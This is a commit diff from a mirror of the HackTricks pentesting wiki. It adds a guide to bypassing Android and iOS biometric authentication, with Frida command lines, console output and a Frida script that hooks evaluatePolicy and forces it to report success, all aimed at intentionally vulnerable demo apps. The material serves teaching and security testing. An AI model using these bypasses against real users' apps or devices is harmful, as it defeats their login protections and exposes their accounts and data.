mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3625] No subject
This commit is contained in:
parent
28d736223e
commit
1228362065
4 changed files with 133 additions and 2 deletions
|
@ -230,6 +230,7 @@
|
|||
* [APK decompilers](mobile-pentesting/android-app-pentesting/apk-decompilers.md)
|
||||
* [AVD - Android Virtual Device](mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md)
|
||||
* [Burp Suite Configuration for Android](mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md)
|
||||
* [Bypass Biometric Authentication (Android)](mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md)
|
||||
* [content:// protocol](mobile-pentesting/android-app-pentesting/content-protocol.md)
|
||||
* [Drozer Tutorial](mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md)
|
||||
* [Exploiting Content Providers](mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md)
|
||||
|
|
|
@ -224,6 +224,12 @@ With this knowledge, **mariana-trench will review the code and find possible vul
|
|||
|
||||
An application may contain secrets (API keys, passwords, hidden urls, subdomains...) inside of it that you might be able to discover. You could us a tool such as [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
|
||||
|
||||
### Bypass Biometric Authentication
|
||||
|
||||
{% content-ref url="bypass-biometric-authentication-android.md" %}
|
||||
[bypass-biometric-authentication-android.md](bypass-biometric-authentication-android.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Other interesting functions
|
||||
|
||||
* **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
|
||||
|
|
|
@ -0,0 +1,62 @@
|
|||
# Bypass Biometric Authentication (Android)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
These methods were copied from [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/)
|
||||
|
||||
## **Method 1 – When the crypto object is not used**
|
||||
|
||||
The authentication implementation relies on the callback _**onAuthenticationSucceded** _ being called. The researchers from F-Secure developed a [**Frida script**](https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) that can be used to **bypass** the NULL _**CryptoObject** _ in _**onAuthenticationSucceeded(…)**_. The script will automatically bypass the fingerprint when the aforementioned method is called. Here is a short example that shows the bypass for the Android Fingerprint. The complete application can be downloaded from my [GitHub](https://github.com/St3v3nsS/InsecureBanking).
|
||||
|
||||
```javascript
|
||||
biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() {
|
||||
@Override
|
||||
public void onAuthenticationSucceeded(@NonNull BiometricPrompt.AuthenticationResult result) {
|
||||
Toast.makeText(MainActivity.this,"Success",Toast.LENGTH_LONG).show();
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
```
|
||||
frida -U -f com.st3v3nss.insecurebankingfingerprint --no-pause -l fingerprint-bypass.js
|
||||
```
|
||||
|
||||
### **Method 2 – Exception Handling**
|
||||
|
||||
This [**Frida script**](https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js) developed by F-Secure can be used to bypass the insecure usage of the crypto object. All the script needs to do is manually call the _**onAuthenticationSucceded**_ with a **non-authorized** (not unlocked by fingerprint) _**CryptoObject**_ stored in the Keystore. The catch is if the application will attempt to use another cipher object, then an **exception will be thrown**. This script will attempt to call _**onAuthenticationSucceded** _ and catch the exception _**javax.crypto.IllegalBlockSizeException**_ in _Cipher_ class. From now on, **any objects the application uses will be encrypted using this new key**.
|
||||
|
||||
```
|
||||
frida -U -f com.st3v3nss.insecurebankingfingerprint --no-pause -l fingerprint-bypass-via-exception-handling.js
|
||||
```
|
||||
|
||||
Now, go to the fingerprint screen and wait for the _authenticate_() to be called. Once you see that on the screen, go ahead and type _**bypass()**_ in the Frida console:
|
||||
|
||||
```
|
||||
Spawning `com.st3v3nss.insecurebankingfingerprint`...
|
||||
[Android Emulator 5554::com.st3v3nss.insecurebankingfingerprint ]-> Hooking BiometricPrompt.authenticate()...
|
||||
Hooking BiometricPrompt.authenticate2()...
|
||||
Hooking FingerprintManager.authenticate()...
|
||||
[Android Emulator 5554::com.st3v3nss.insecurebankingfingerprint ]-> bypass()
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
|
@ -882,7 +882,7 @@ Please be aware that using either the `LocalAuthentication.framework` or the `Se
|
|||
|
||||
### Local Authentication Framework
|
||||
|
||||
Developers can display an **authentication prompt** by utilizing the function `evaluatePolicy` of the `LAContext` class. Two available policies define acceptable forms of authentication:
|
||||
Developers can display an **authentication prompt** by utilizing the function **`evaluatePolicy`** of the **`LAContext`** class. Two available policies define acceptable forms of authentication:
|
||||
|
||||
* `deviceOwnerAuthentication`(Swift) or `LAPolicyDeviceOwnerAuthentication`(Objective-C): When available, the user is prompted to perform Touch ID authentication. If Touch ID is not activated, the device passcode is requested instead. If the device passcode is not enabled, policy evaluation fails.
|
||||
* `deviceOwnerAuthenticationWithBiometrics` (Swift) or `LAPolicyDeviceOwnerAuthenticationWithBiometrics`(Objective-C): Authentication is restricted to biometrics where the user is prompted for Touch ID.
|
||||
|
@ -1037,7 +1037,9 @@ If `Security.framework` is used, only the second one will be shown.
|
|||
|
||||
### Local Authentication Framework Bypass
|
||||
|
||||
[Objection Biometrics Bypass](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) can be used to bypass LocalAuthentication. Objection **uses Frida to instrument the `evaluatePolicy` function so that it returns `True`** even if authentication was not successfully performed. Use the `ios ui biometrics_bypass` command to bypass the insecure biometric authentication. Objection will register a job, which will replace the `evaluatePolicy` result. It will work in both, Swift and Objective-C implementations.
|
||||
#### Objection
|
||||
|
||||
****[**Objection Biometrics Bypass**](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) **** can be used to bypass LocalAuthentication. Objection **uses Frida to instrument the `evaluatePolicy` function so that it returns `True`** even if authentication was not successfully performed. Use the `ios ui biometrics_bypass` command to bypass the insecure biometric authentication. Objection will register a job, which will replace the `evaluatePolicy` result. It will work in both, Swift and Objective-C implementations.
|
||||
|
||||
```bash
|
||||
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass
|
||||
|
@ -1050,6 +1052,66 @@ If `Security.framework` is used, only the second one will be shown.
|
|||
|
||||
If vulnerable, the module will automatically bypass the login form.
|
||||
|
||||
#### Frida
|
||||
|
||||
An example of a use of **`evaluatePolicy`** from [DVIA-v2 application](https://github.com/prateek147/DVIA-v2):
|
||||
|
||||
```swift
|
||||
+(void)authenticateWithTouchID {
|
||||
LAContext *myContext = [[LAContext alloc] init];
|
||||
NSError *authError = nil;
|
||||
NSString *myLocalizedReasonString = @"Please authenticate yourself";
|
||||
|
||||
if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) {
|
||||
[myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics
|
||||
localizedReason:myLocalizedReasonString
|
||||
reply:^(BOOL success, NSError *error) {
|
||||
if (success) {
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
[TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"];
|
||||
});
|
||||
} else {
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
[TouchIDAuthentication showAlert:@"Authentication Failed !" withTitle:@"Error"];
|
||||
});
|
||||
}
|
||||
}];
|
||||
} else {
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
[TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"];
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
To bypass the Local Authentication, we have to write a Frida script that **bypasses** the aforementioned _**evaluatePolicy** _ check. As you can see in the above-pasted code snippet, the _**evaluatePolicy**_ uses a **callback** that determines the **result**. So, the easiest way to achieve the hack is to intercept that callback and make sure it **always returns the **_**success=1**_.
|
||||
|
||||
```swift
|
||||
// from https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/
|
||||
if(ObjC.available) {
|
||||
console.log("Injecting...");
|
||||
var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];
|
||||
Interceptor.attach(hook.implementation, {
|
||||
onEnter: function(args) {
|
||||
var block = new ObjC.Block(args[4]);
|
||||
const callback = block.implementation;
|
||||
block.implementation = function (error, value) {
|
||||
|
||||
console.log("Changing the result value to true")
|
||||
const result = callback(1, null);
|
||||
return result;
|
||||
};
|
||||
},
|
||||
});
|
||||
} else {
|
||||
console.log("Objective-C Runtime is not available!");
|
||||
}
|
||||
```
|
||||
|
||||
```
|
||||
frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-ios.js
|
||||
```
|
||||
|
||||
## Sensitive Functionality Exposure Through IPC
|
||||
|
||||
### Custom URI Handlers / Deeplinks / Custom Schemes
|
||||
|
|
Loading…
Reference in a new issue